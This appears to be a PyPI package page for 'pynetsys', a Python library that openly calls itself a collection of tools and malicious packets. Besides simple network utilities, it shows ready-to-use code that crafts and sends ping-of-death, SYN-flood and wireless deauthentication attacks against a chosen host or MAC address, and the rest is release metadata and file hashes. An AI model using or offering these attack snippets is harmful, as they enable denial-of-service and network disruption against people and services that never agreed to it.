pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets..
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
Create malicious packet and send
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pynetsys-0.0.9.tar.gz
(9.4 kB
view details)
Built Distribution
File details
Details for the file pynetsys-0.0.9.tar.gz
.
File metadata
- Download URL: pynetsys-0.0.9.tar.gz
- Upload date:
- Size: 9.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.5
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 2695eaaf0cb07f82100877874840dc970ad72eeccc1383e5c794522c46248073 |
|
MD5 | 03fc87c85f8006cebf2fa26a102682b6 |
|
BLAKE2b-256 | 21599daff0d62a23a02bbe1d0e2452b54b99553bb051b9de80dea4d5ec8b7f55 |
File details
Details for the file pynetsys-0.0.9-py3-none-any.whl
.
File metadata
- Download URL: pynetsys-0.0.9-py3-none-any.whl
- Upload date:
- Size: 9.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.5
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | ed3b8221dc238c040b48bcb8725c3068259fd199d0163f138a72e72ba5770ad1 |
|
MD5 | 14adef84555a35359752dac7cc351135 |
|
BLAKE2b-256 | 81c7f7bda6dc31c851e2b04b80f4b33a7aaf2267aaa4f5b70a529134190e755c |